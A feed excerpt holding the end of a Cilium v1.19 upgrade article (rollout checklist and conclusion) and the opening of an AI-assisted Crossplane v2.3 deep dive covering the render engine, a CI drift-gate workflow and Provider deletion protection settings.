&lt;td&gt;Platform team&lt;/td&gt;
&lt;td&gt;Verify allocation from payments-pool for new pods&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;7&lt;/td&gt;
&lt;td&gt;Enable IPsec strict mode in staging via 4-step gradient&lt;/td&gt;
&lt;td&gt;Platform team&lt;/td&gt;
&lt;td&gt;14-day report with unencrypted drops = 0&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;8&lt;/td&gt;
&lt;td&gt;Enable Ztunnel Beta in staging — only one namespace enrolled&lt;/td&gt;
&lt;td&gt;Platform team&lt;/td&gt;
&lt;td&gt;SPIRE integration OK, mTLS flow visible in Hubble&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;9&lt;/td&gt;
&lt;td&gt;Verify Hubble drop tagging, encrypted filter, Trace IP Options&lt;/td&gt;
&lt;td&gt;Observability team&lt;/td&gt;
&lt;td&gt;Operations runbook updated for the 3 features&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;10&lt;/td&gt;
&lt;td&gt;Enable ICMPv4 friendly deny — check external firewall ICMP rules&lt;/td&gt;
&lt;td&gt;Network + Platform team&lt;/td&gt;
&lt;td&gt;Immediate termination verified (curl/ping tests)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;11&lt;/td&gt;
&lt;td&gt;Upgrade prod to v1.19.4 (strict OFF, Ztunnel OFF)&lt;/td&gt;
&lt;td&gt;Platform team&lt;/td&gt;
&lt;td&gt;prod &lt;code&gt;cilium version&lt;/code&gt; = 1.19.4&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;12&lt;/td&gt;
&lt;td&gt;Enable Multi-Pool IPAM in prod — payments and logs workloads first&lt;/td&gt;
&lt;td&gt;Platform team&lt;/td&gt;
&lt;td&gt;Per-pool IP usage exported as Prometheus metric&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;13&lt;/td&gt;
&lt;td&gt;Gradually enable IPsec strict mode in prod — 4-step standard procedure&lt;/td&gt;
&lt;td&gt;Platform team&lt;/td&gt;
&lt;td&gt;30-day unencrypted drops = 0 + compliance audit evidence&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;14&lt;/td&gt;
&lt;td&gt;Enable ICMPv4 friendly deny in prod — paired with step 7&lt;/td&gt;
&lt;td&gt;Platform team&lt;/td&gt;
&lt;td&gt;Average denial termination time 30s → 1s measurement&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;15&lt;/td&gt;
&lt;td&gt;Add Prometheus alerts — &lt;code&gt;cilium_encryption_unencrypted_packets_dropped_total&lt;/code&gt; increase, ClusterMesh policy drop spikes, Multi-Pool exhaustion&lt;/td&gt;
&lt;td&gt;Observability team&lt;/td&gt;
&lt;td&gt;Alert rule PR merged, fire/resolve test passes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;16&lt;/td&gt;
&lt;td&gt;Operational RFC — Ztunnel Beta enrollment for new workloads only, existing workloads after Beta exits&lt;/td&gt;
&lt;td&gt;Platform team&lt;/td&gt;
&lt;td&gt;RFC merged, scheduled for quarterly security review&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h2&gt;
  
  
  10. Conclusion — the 10-year inflection point that flipped defaults toward safety
&lt;/h2&gt;

&lt;p&gt;Wrap the six changes of v1.19 in one line: &lt;strong&gt;"Cilium spent ten years getting to the point where it can ship operational safety nets as defaults."&lt;/strong&gt; Strict mode for IPsec and WireGuard structurally erases the plaintext window of best-effort encryption. Ztunnel integration brings sidecarless workload authentication to beta and aligns with the Istio Ambient camp. ClusterMesh policy-default-local-cluster inverts the most dangerous default of the past six years. Multi-Pool IPAM Stable hands back CIDR autonomy in a safe form. Hubble drop tagging, encrypted-flow filters, and Trace IP Options answer "why was this dropped?" in one command. ICMPv4 friendly deny collapses 30-second retry loops to 1 second.&lt;/p&gt;

&lt;p&gt;Three reminders for operators as we close. (1) &lt;strong&gt;Audit ClusterMesh policies before upgrading&lt;/strong&gt; — the policy-default-local-cluster default flip is the most common v1.19 incident cause, and it can cut traffic without warning. (2) &lt;strong&gt;Roll out strict mode in four steps&lt;/strong&gt; — key distribution → enable strict (allow remote = true) → 1-week soak → allow remote = false → 30-day stability monitoring is the safe progression. (3) &lt;strong&gt;Adopt Ztunnel Beta starting from new namespaces&lt;/strong&gt; — SPIRE / SPIFFE SVID integration is operationally heavy, so enroll payments and high-sensitivity workloads first and revisit the rest after v1.20 GA. The 16-item checklist in §9 is exactly that, expressed as an internal procedure. The shortest one-line recommendation: &lt;em&gt;"Upgrade dev to v1.19.4 today, and open the ClusterMesh policy audit PR this week."&lt;/em&gt;&lt;/p&gt;




&lt;p&gt;&lt;strong&gt;Found this useful?&lt;/strong&gt; Hit the ❤️ reaction to help others find it too!&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;What's your experience with Cilium strict mode or Ztunnel?&lt;/strong&gt; Share in the comments — I'd love to hear about your production rollout and the lessons you learned.&lt;/p&gt;




&lt;p&gt;ⓘ This article was produced by ManoIT's automated blogging pipeline (Claude Opus 4.6 + Cowork Agent) by analyzing the Cilium v1.19.0 release notes (GitHub Discussions #44191) published on May 13, 2026, the subsequent v1.19.4 patch (2026-05-27), the Encryption / IPAM / Hubble / ClusterMesh docs at docs.cilium.io, Isovalent's v1.19 release blog, and InfoQ's 10-year retrospective as primary sources. The alpha/beta gate flag names, behaviors, and metrics in this article reflect the official documentation as of the publication date (2026-05-28); Beta features may change in subsequent releases. Verify against cilium/cilium GitHub Releases and docs.cilium.io before applying to production. The internal-adoption examples cite an adapted ManoIT platform-team RFC.&lt;/p&gt;




&lt;p&gt;&lt;em&gt;Originally published at &lt;a href="https://www.manoit.co.kr/forum/view/1479495" rel="noopener noreferrer"&gt;ManoIT Tech Blog&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>kubernetes</category>
      <category>security</category>
      <category>observability</category>
      <category>servicemesh</category>
    </item>
    <item>
      <title>Crossplane v2.3 Deep Dive — High-Fidelity Render Engine, Provider Deletion Protection, Reconciliation Annotations, and CLI Separation</title>
      <dc:creator>daniel jeong</dc:creator>
      <pubDate>Wed, 27 May 2026 00:42:22 +0000</pubDate>
      <link>https://dev.to/x4nent/crossplane-v23-deep-dive-high-fidelity-render-engine-provider-deletion-protection-1j4j</link>
      <guid>https://dev.to/x4nent/crossplane-v23-deep-dive-high-fidelity-render-engine-provider-deletion-protection-1j4j</guid>
      <description>&lt;h1&gt;
  
  
  Crossplane v2.3 Deep Dive — High-Fidelity Render Engine, Provider Deletion Protection, Reconciliation Annotations, and CLI Separation Redefining the 2026 Kubernetes Control Plane
&lt;/h1&gt;

&lt;p&gt;On &lt;strong&gt;May 21, 2026&lt;/strong&gt;, the Crossplane maintainers shipped &lt;strong&gt;v2.3.0&lt;/strong&gt;, the quarterly release that — for the first time in the v2 series — turned the "production-grade control plane" pitch into measurable operational evidence. v2.0 brought the big architectural earthquake (namespaced XRs and MRs, composing &lt;em&gt;any&lt;/em&gt; resource, Operations), v2.1/v2.2 made it run, and &lt;strong&gt;v2.3 closes the long-standing day-2 gaps&lt;/strong&gt; that platform teams have been quietly working around for years.&lt;/p&gt;

&lt;p&gt;Six changes carry the release:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;High-Fidelity Render Engine&lt;/strong&gt; — &lt;code&gt;crossplane render&lt;/code&gt; now drives the real in-cluster composite reconciler via a hidden &lt;code&gt;crossplane internal render&lt;/code&gt; subcommand, instead of a parallel reimplementation.&lt;/li&gt;
&lt;li&gt;Alpha &lt;strong&gt;Provider Deletion Protection&lt;/strong&gt; — Crossplane auto-creates &lt;code&gt;ClusterUsage&lt;/code&gt; resources that block Provider deletion through the existing Usage webhook while managed resources of that Provider's kinds still exist.&lt;/li&gt;
&lt;li&gt;Two new &lt;strong&gt;reconciliation annotations&lt;/strong&gt; — &lt;code&gt;crossplane.io/poll-interval&lt;/code&gt; overrides the controller-level poll interval per-resource, and &lt;code&gt;crossplane.io/reconcile-requested-at&lt;/code&gt; triggers an immediate reconcile whenever the value changes.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;XR Circuit Breaker reset&lt;/strong&gt; — when an XR is deleted, its circuit-breaker state is now discarded so a same-named replacement starts clean.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;No-op status update skip&lt;/strong&gt; for &lt;code&gt;CompositionRevision&lt;/code&gt; and composite reconcilers, behind the alpha gate &lt;code&gt;--enable-no-op-status-update-skip&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Crossplane CLI repository split&lt;/strong&gt; — the CLI moves to its own repository (&lt;code&gt;crossplane/crossplane-cli&lt;/code&gt;) with an independent release cadence.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;This article unpacks each of the six changes at the level of code paths and alpha gate flags, and lays out the staged upgrade/observation/rollback workflow we used at ManoIT across three control planes (prod/stage/dev).&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Disclosure&lt;/strong&gt;: cross-posted from the &lt;a href="https://www.manoit.co.kr/forum/view/1478693" rel="noopener noreferrer"&gt;ManoIT tech blog&lt;/a&gt;. Original (Korean) published 2026-05-27. AI-assisted authoring with editorial review.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h2&gt;
  
  
  1. Why May 21, 2026 Is a Crossplane Inflection Point
&lt;/h2&gt;

&lt;p&gt;Crossplane was open-sourced by Upbound in &lt;strong&gt;December 2018&lt;/strong&gt;, joined the CNCF as a Sandbox project in 2020, became Incubating in 2021, and was &lt;strong&gt;promoted to CNCF Graduated on October 28, 2025&lt;/strong&gt;. The identity drift between v1 ("Kubernetes-native IaC, a Terraform alternative") and v2 ("a control-plane SDK on top of the Kubernetes API") matters because it changes how you should read the v2.3 release notes.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Date&lt;/th&gt;
&lt;th&gt;Event&lt;/th&gt;
&lt;th&gt;Operational meaning&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;2018-12&lt;/td&gt;
&lt;td&gt;Upbound open-sources Crossplane&lt;/td&gt;
&lt;td&gt;"IaC on Kubernetes" vision begins&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2020-09&lt;/td&gt;
&lt;td&gt;CNCF Sandbox accepted&lt;/td&gt;
&lt;td&gt;Community governance, stage 1&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2021-09&lt;/td&gt;
&lt;td&gt;CNCF Incubating&lt;/td&gt;
&lt;td&gt;Production-use accumulation phase&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2024-05&lt;/td&gt;
&lt;td&gt;v1.17 — native patch &amp;amp; transform deprecated&lt;/td&gt;
&lt;td&gt;Composition Function era declared&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2025-07&lt;/td&gt;
&lt;td&gt;v2.0 — namespaced XR/MR, Operations alpha, compose any resource&lt;/td&gt;
&lt;td&gt;Identity shift to "control-plane SDK"&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2025-10-28&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;CNCF Graduated&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Enterprise adoption guidance formalized&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2025-11&lt;/td&gt;
&lt;td&gt;v2.1 — namespaced MR stable, MRD alpha&lt;/td&gt;
&lt;td&gt;Selective resource activation for large Providers&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2026-03&lt;/td&gt;
&lt;td&gt;v2.2 — Pipeline Inspector, RequiredSchemas, ImageConfig, XRD CEL validation&lt;/td&gt;
&lt;td&gt;Composition Function debugging/validation gaps closed&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;2026-05-21&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;v2.3 — Render Engine unification, Provider deletion protection, reconcile annotations ×2, CLI split&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Local ↔ cluster gap removed; operational safety net hardened&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2027-02&lt;/td&gt;
&lt;td&gt;v2.3 EOL planned&lt;/td&gt;
&lt;td&gt;Quarterly release + 9-month support window maintained&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Two operational headlines:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;The six-year chronic pain of "render locally, fail in cluster" is structurally gone&lt;/strong&gt; — the maintainers retired the parallel reconciler used by &lt;code&gt;crossplane render&lt;/code&gt; and now expose the real composite reconciler as the hidden &lt;code&gt;crossplane internal render&lt;/code&gt; subcommand, which &lt;code&gt;crossplane render&lt;/code&gt; (and downstream tools like &lt;code&gt;crossplane-diff&lt;/code&gt;) calls.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Two new alpha gates (&lt;code&gt;--enable-provider-deletion-protection&lt;/code&gt;, &lt;code&gt;--enable-no-op-status-update-skip&lt;/code&gt;) close the operational safety-net gap immediately&lt;/strong&gt; — accidental Provider deletion is the #1 way Crossplane operators have orphaned MRs, and the no-op status skip cuts ETCD PUT pressure that scales linearly with cluster size.&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  2. High-Fidelity Render Engine — Removing the Local Render ↔ Cluster Reconcile Gap
&lt;/h2&gt;

&lt;p&gt;The biggest maintainer-side work in v2.3 happened where you couldn't see it. &lt;code&gt;crossplane render&lt;/code&gt; has, since the v1 days, been the way to preview how an XR resolves through a Composition Function pipeline. The catch: the reconciler that &lt;code&gt;render&lt;/code&gt; used was a &lt;strong&gt;structurally separate reimplementation&lt;/strong&gt; of what the in-cluster composite controller actually ran.&lt;/p&gt;

&lt;h3&gt;
  
  
  2.1 The Two-Reconciler Gap Through v2.2
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Axis&lt;/th&gt;
&lt;th&gt;Local &lt;code&gt;render&lt;/code&gt; (v2.2)&lt;/th&gt;
&lt;th&gt;In-cluster controller (v2.2)&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Reconciler implementation&lt;/td&gt;
&lt;td&gt;Render-only reimplementation&lt;/td&gt;
&lt;td&gt;Official &lt;code&gt;composite&lt;/code&gt; package implementation&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Pipeline step context&lt;/td&gt;
&lt;td&gt;Partial propagation&lt;/td&gt;
&lt;td&gt;Full propagation&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Required Resources/Schemas&lt;/td&gt;
&lt;td&gt;Partial in local&lt;/td&gt;
&lt;td&gt;Full RequiredSchemas since v2.2&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Managed metadata (labels, owner refs)&lt;/td&gt;
&lt;td&gt;Some missing post-render&lt;/td&gt;
&lt;td&gt;Attached as actually applied&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Downstream tools (&lt;code&gt;crossplane-diff&lt;/code&gt;)&lt;/td&gt;
&lt;td&gt;Inherited the gap through &lt;code&gt;render&lt;/code&gt; output&lt;/td&gt;
&lt;td&gt;—&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;"Works locally, breaks in cluster" issues&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Frequent&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;—&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h3&gt;
  
  
  2.2 The v2.3 Fix — Share Code via &lt;code&gt;crossplane internal render&lt;/code&gt;
&lt;/h3&gt;

&lt;p&gt;v2.3 exposes the in-cluster composite reconciler as a callable subcommand. The new name is &lt;code&gt;crossplane internal render&lt;/code&gt; — the "internal" prefix is deliberate: it's a backend for other tools, not a user-facing command. &lt;code&gt;crossplane render&lt;/code&gt; now calls this backend, so local output goes through the exact same code path as the cluster.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# v2.3: crossplane render now invokes the same composite reconciler internally&lt;/span&gt;
crossplane render &lt;span class="se"&gt;\&lt;/span&gt;
  examples/xr.yaml &lt;span class="se"&gt;\&lt;/span&gt;
  examples/composition.yaml &lt;span class="se"&gt;\&lt;/span&gt;
  examples/functions.yaml &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--include-full-xr&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--include-context&lt;/span&gt;

&lt;span class="c"&gt;# You can now 1:1 compare the local output to what the controller produces in cluster&lt;/span&gt;
kubectl get app my-app &lt;span class="nt"&gt;-o&lt;/span&gt; yaml &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; cluster.yaml
crossplane render examples/xr.yaml examples/composition.yaml examples/functions.yaml &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; local.yaml
diff cluster.yaml local.yaml   &lt;span class="c"&gt;# Note: post-v2.3, substantive diff is 0 modulo metadata/status&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The downstream impact is large. &lt;code&gt;crossplane-diff&lt;/code&gt;, &lt;code&gt;crossplane-test&lt;/code&gt;, and every CI workflow that validates compositions on PRs were all subject to the same gap, so v2.3 removes one whole class of "PR was green, merge broke prod" incident.&lt;/p&gt;

&lt;h3&gt;
  
  
  2.3 Operational Application — Render-vs-Cluster Diff Gate in CI
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# .github/workflows/crossplane-composition-check.yml&lt;/span&gt;
&lt;span class="c1"&gt;# Note: pre-v2.3, this comparison is meaningless because of the render gap&lt;/span&gt;
&lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Crossplane Composition Drift Gate&lt;/span&gt;
&lt;span class="na"&gt;on&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;pull_request&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;paths&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;[&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;compositions/**"&lt;/span&gt;&lt;span class="pi"&gt;,&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;xrs/**"&lt;/span&gt;&lt;span class="pi"&gt;,&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;functions/**"&lt;/span&gt;&lt;span class="pi"&gt;]&lt;/span&gt;

&lt;span class="na"&gt;jobs&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;drift-gate&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;runs-on&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;ubuntu-24.04&lt;/span&gt;
    &lt;span class="na"&gt;steps&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;uses&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;actions/checkout@v5&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Install Crossplane CLI v2.3.0&lt;/span&gt;
        &lt;span class="na"&gt;run&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;|&lt;/span&gt;
          &lt;span class="s"&gt;curl -sSL "https://releases.crossplane.io/stable/v2.3.0/bin/linux_amd64/crossplane" -o crossplane&lt;/span&gt;
          &lt;span class="s"&gt;install -m 0755 crossplane /usr/local/bin/crossplane&lt;/span&gt;
          &lt;span class="s"&gt;crossplane version --client   # client: 2.3.0&lt;/span&gt;

      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Render with Composition Function pipeline&lt;/span&gt;
        &lt;span class="na"&gt;run&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;|&lt;/span&gt;
          &lt;span class="s"&gt;# High-Fidelity Render — same code path as in-cluster controller&lt;/span&gt;
          &lt;span class="s"&gt;crossplane render \&lt;/span&gt;
            &lt;span class="s"&gt;xrs/${{ matrix.xr }}.yaml \&lt;/span&gt;
            &lt;span class="s"&gt;compositions/${{ matrix.composition }}.yaml \&lt;/span&gt;
            &lt;span class="s"&gt;functions/index.yaml \&lt;/span&gt;
            &lt;span class="s"&gt;--include-full-xr \&lt;/span&gt;
            &lt;span class="s"&gt;--include-context \&lt;/span&gt;
            &lt;span class="s"&gt;-o yaml &amp;gt; rendered.yaml&lt;/span&gt;

      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Fetch live cluster state (prod read-only)&lt;/span&gt;
        &lt;span class="na"&gt;run&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;|&lt;/span&gt;
          &lt;span class="s"&gt;kubectl --context prod-ro get $(yq '.kind' rendered.yaml) \&lt;/span&gt;
            &lt;span class="s"&gt;$(yq '.metadata.name' rendered.yaml) -o yaml \&lt;/span&gt;
            &lt;span class="s"&gt;| yq 'del(.metadata.managedFields, .metadata.resourceVersion, .metadata.uid, .status)' \&lt;/span&gt;
            &lt;span class="s"&gt;&amp;gt; cluster.yaml&lt;/span&gt;

      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Diff and fail on unexpected drift&lt;/span&gt;
        &lt;span class="na"&gt;run&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;|&lt;/span&gt;
          &lt;span class="s"&gt;diff -u cluster.yaml rendered.yaml || {&lt;/span&gt;
            &lt;span class="s"&gt;echo "::error::Composition output diverges from cluster — review before merge"&lt;/span&gt;
            &lt;span class="s"&gt;exit 1&lt;/span&gt;
          &lt;span class="s"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  3. Alpha Provider Deletion Protection — Auto ClusterUsage + Usage Webhook
&lt;/h2&gt;

&lt;p&gt;The second change targets the highest-frequency operator incident: &lt;strong&gt;"I accidentally deleted a Provider and every MR of its kinds was orphaned."&lt;/strong&gt; Every Crossplane operator has either lived this or heard the story.&lt;/p&gt;

&lt;h3&gt;
  
  
  3.1 The Existing Usage Webhook's Limitation — XR/MR Level Only
&lt;/h3&gt;

&lt;p&gt;Crossplane has shipped the &lt;code&gt;Usage&lt;/code&gt; resource since v1 to express "while resource A is in use, refuse to delete resource B." A ValidatingAdmissionWebhook intercepts DELETE requests and rejects them if a &lt;code&gt;Usage&lt;/code&gt; still names a live dependency. The problem: &lt;strong&gt;Provider packages themselves had no equivalent guard&lt;/strong&gt;. One &lt;code&gt;kubectl delete provider provider-aws&lt;/code&gt; would strand every MR of every kind that Provider defined.&lt;/p&gt;

&lt;h3&gt;
  
  
  3.2 v2.3 — Auto-Create &lt;code&gt;ClusterUsage&lt;/code&gt; to Block Provider DELETE
&lt;/h3&gt;

&lt;p&gt;v2.3 introduces the alpha gate &lt;code&gt;--enable-provider-deletion-protection&lt;/code&gt;. When on, Crossplane automatically:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Step&lt;/th&gt;
&lt;th&gt;Action&lt;/th&gt;
&lt;th&gt;Implementation&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;1&lt;/td&gt;
&lt;td&gt;On Provider install, create a &lt;code&gt;ClusterUsage&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Provider controller creates &lt;code&gt;kind: ClusterUsage&lt;/code&gt; at bootstrap, &lt;code&gt;spec.of&lt;/code&gt; points to the Provider itself&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2&lt;/td&gt;
&lt;td&gt;While MRs of that Provider's kinds exist, mark &lt;code&gt;ClusterUsage&lt;/code&gt; Active&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;spec.by&lt;/code&gt; selector auto-maps to the Provider's CRD labels&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;Provider DELETE intercepted by Usage webhook&lt;/td&gt;
&lt;td&gt;Reuses the existing Usage webhook code path&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;4&lt;/td&gt;
&lt;td&gt;DELETE allowed only when active MRs = 0&lt;/td&gt;
&lt;td&gt;Otherwise: HTTP 422 + human-readable message&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;5&lt;/td&gt;
&lt;td&gt;Provider tear-down requires explicit opt-out&lt;/td&gt;
&lt;td&gt;Operator clears all MRs, then &lt;code&gt;kubectl delete clusterusage protect-provider-aws-...&lt;/code&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h3&gt;
  
  
  3.3 Turning It On — Helm Values + Gate Flag
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# helm/crossplane-values.yaml&lt;/span&gt;
&lt;span class="c1"&gt;# Note: alpha feature — verify for 1 week in staging before production&lt;/span&gt;
&lt;span class="na"&gt;crossplane&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;args&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;--debug&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;--enable-environment-configs&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;--enable-operations&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;--enable-provider-deletion-protection&lt;/span&gt;   &lt;span class="c1"&gt;# v2.3 alpha gate&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;--enable-no-op-status-update-skip&lt;/span&gt;       &lt;span class="c1"&gt;# v2.3 alpha — cut ETCD writes&lt;/span&gt;
  &lt;span class="na"&gt;resourcesCrossplane&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;limits&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;cpu&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;500m"&lt;/span&gt;
      &lt;span class="na"&gt;memory&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;1Gi"&lt;/span&gt;
    &lt;span class="na"&gt;requests&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;cpu&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;100m"&lt;/span&gt;
      &lt;span class="na"&gt;memory&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;256Mi"&lt;/span&gt;
  &lt;span class="na"&gt;metrics&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;enabled&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;   &lt;span class="c1"&gt;# Prometheus scraping recommended&lt;/span&gt;
